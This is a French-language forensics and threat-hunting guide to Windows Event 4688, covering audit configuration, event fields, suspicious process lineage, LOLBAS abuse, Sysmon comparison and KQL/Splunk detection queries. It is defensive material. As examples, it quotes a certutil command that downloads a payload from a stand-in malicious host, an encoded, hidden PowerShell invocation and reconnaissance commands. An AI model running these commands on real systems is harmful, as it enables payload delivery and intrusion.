Analyse d'Artefact : Événement 4688 et Filiation des Processus

Note

Résumé exécutif : l’Événement de sécurité Windows 4688 (“Un nouveau processus a été créé”) est la pierre angulaire absolue de l’analyse comportementale sur les terminaux. Il enregistre chaque exécution sur un système Windows, fournissant l’identité de l’utilisateur, le chemin de l’exécutable et la relation critique parent-enfant du processus. Lorsqu’il est correctement configuré pour capturer les arguments de la ligne de commande, l’Événement 4688 se transforme, passant d’un simple journal d’audit à un récit définitif des intentions de l’attaquant, permettant aux analystes de traquer les techniques “Living off the Land” (LOLBAS) et les exécutions de reverse-shells.

1. Le prérequis de visibilité (Configuration GPO)

Par défaut, les environnements Windows modernes n’enregistrent ni la création de processus, ni les arguments de la ligne de commande, invoquant des raisons de confidentialité et d’espace de stockage. Un Événement 4688 dépourvu des données de ligne de commande est sévèrement dégradé pour les besoins du DFIR.

Afin de débloquer le plein potentiel de cet artefact, les administrateurs doivent déployer un objet de stratégie de groupe (GPO) sur l’ensemble du domaine :

1. Activer l’audit de la création de processus : naviguez vers Configuration ordinateur > Stratégies > Paramètres Windows > Paramètres de sécurité > Configuration avancée de la stratégie d'audit > Suivi détaillé. Définissez Auditer la création de processus sur Succès.
2. Activer l’audit de la ligne de commande (CRITIQUE) : naviguez vers Configuration ordinateur > Stratégies > Modèles d'administration > Système > Audit de la création de processus. Définissez Inclure la ligne de commande dans les événements de création de processus sur Activé.

2. Anatomie de l’Événement 4688

Une fois correctement configuré, le parsing d’un enregistrement d’Événement 4688 livre trois catégories hautement structurées de données forensiques.

A. Le Sujet (Qui)

• ID de sécurité / Nom du compte : identifie l’utilisateur ou le compte de service ayant initié l’exécution. Si un compte d’utilisateur standard génère un outil d’administration, cela justifie un examen immédiat.

B. Informations sur le nouveau processus (Quoi et Comment)

• Nom du nouveau processus : le chemin absolu du binaire exécuté (ex: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe).
• ID du nouveau processus (PID) : l’identifiant hexadécimal du processus généré.
• Ligne de commande du processus : le champ le plus précieux. Il révèle exactement comment le binaire a été exécuté, exposant les arguments, les indicateurs (flags) et les scripts intégrés (ex: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand JAB...).

C. Informations sur le processus créateur (D’où)

• Nom du processus créateur : le chemin de l’exécutable parent.
• ID du processus créateur : le PID parent. Il s’agit du lien cryptographique utilisé pour reconstituer la filiation des processus (l’arborescence des processus).

3. Triage DFIR : chasser par filiation de processus

L’analyse de la filiation des processus repose sur la compréhension du comportement standard de Windows. L’activité malveillante enfreint souvent ces règles logiques. Les analystes agrègent (stacking) les journaux de l’Événement 4688 pour trouver des relations parent-enfant anormales.

Phishing et abus de macros

Filiation suspecte : outlook.exe ou winword.exe → cmd.exe ou powershell.exe. Les traitements de texte n’ont aucune raison légitime de générer des interpréteurs de commandes. C’est la signature classique d’une macro malveillante exécutant une charge utile (dropper).

Exécution de Web Shell

Filiation suspecte : w3wp.exe (IIS), httpd.exe, ou tomcat.exe → cmd.exe ou whoami.exe. Si un démon de serveur web génère un shell interactif ou un binaire de reconnaissance, le serveur a été compromis via un exploit RCE ou un Web Shell.

4. LOLBAS et évasion par ligne de commande

Les acteurs de la menace utilisent massivement les Living Off The Land Binaries and Scripts (LOLBAS) — des outils natifs de Windows comme certutil.exe, bitsadmin.exe ou rundll32.exe — pour télécharger des charges utiles ou exécuter du code sans déposer de malware personnalisé sur le disque.

L’Événement 4688 expose ces techniques via le champ Command Line. Les analystes doivent traquer :

• Cascades de reconnaissance : exécution séquentielle rapide de whoami, net group "Domain Admins" /domain, systeminfo et nltest.
• Offuscation Base64 : les attaquants encodent les charges utiles PowerShell pour échapper aux antivirus basés sur la correspondance de chaînes de caractères. La présence de -enc, -EncodedCommand, ou d’un bloc massif de caractères alphanumériques dans la ligne de commande est hautement suspecte.
• Téléchargements distants : certutil.exe -urlcache -split -f http://malicieux.com/payload.exe

5. Événement 4688 vs Événement Sysmon 1

Bien que l’Événement natif 4688 soit excellent, Microsoft propose une alternative avancée : l’Événement Sysmon 1 (Création de processus). Si les deux sont disponibles, Sysmon est largement supérieur.

Fonctionnalité	Événement Windows 4688	Événement Sysmon 1
Log de la ligne de commande	Nécessite une GPO séparée	Activé par défaut
Hash du binaire	Non disponible	MD5, SHA1, SHA256, IMPHASH
Nom de fichier original	Non disponible	Oui (met en échec le renommage de binaire)
Process GUID	Non disponible	Oui (corrélation sans faille à travers les redémarrages)

6. Requêtes de Threat Hunting

Utilisez ces requêtes pour détecter de manière proactive les filiations de processus anormales et l’offuscation dans votre SIEM.

KQL (Defender XDR / Sentinel)

hunt_obfuscated_powershell.kql

// Détecte les exécutions de PowerShell contenant les marqueurs courants d'encodage Base64
SecurityEvent
| where EventID == 4688
| where ProcessName has "powershell.exe" or ProcessName has "pwsh.exe"
| where CommandLine contains "-e " or CommandLine contains "-enc" or CommandLine contains "-EncodedCommand"
| project TimeGenerated, Computer, Account, ParentProcessName, ProcessName, CommandLine
| sort by TimeGenerated desc

Splunk (Parents suspects)

hunt_suspicious_lineage.spl

# Détecte les applications Office ou les serveurs Web générant des shells de commande
index=windows sourcetype="WinEventLog:Security" EventCode=4688
| eval ParentProcessName=lower(Creator_Process_Name)
| eval ProcessName=lower(New_Process_Name)
| search ParentProcessName IN ("*\\winword.exe", "*\\excel.exe", "*\\outlook.exe", "*\\w3wp.exe", "*\\httpd.exe")
  AND ProcessName IN ("*\\cmd.exe", "*\\powershell.exe", "*\\wscript.exe", "*\\cscript.exe")
| table _time, host, Account_Name, ParentProcessName, ProcessName, Process_Command_Line

---

Références et lectures complémentaires

• MITRE ATT&CK : Command and Scripting Interpreter (T1059)
• Projet LOLBAS : Living Off The Land Binaries and Scripts
• Artefact lié : Télémétrie Sysmon (System Monitor)
• Action liée : Triage des alertes EDR et analyse de filiation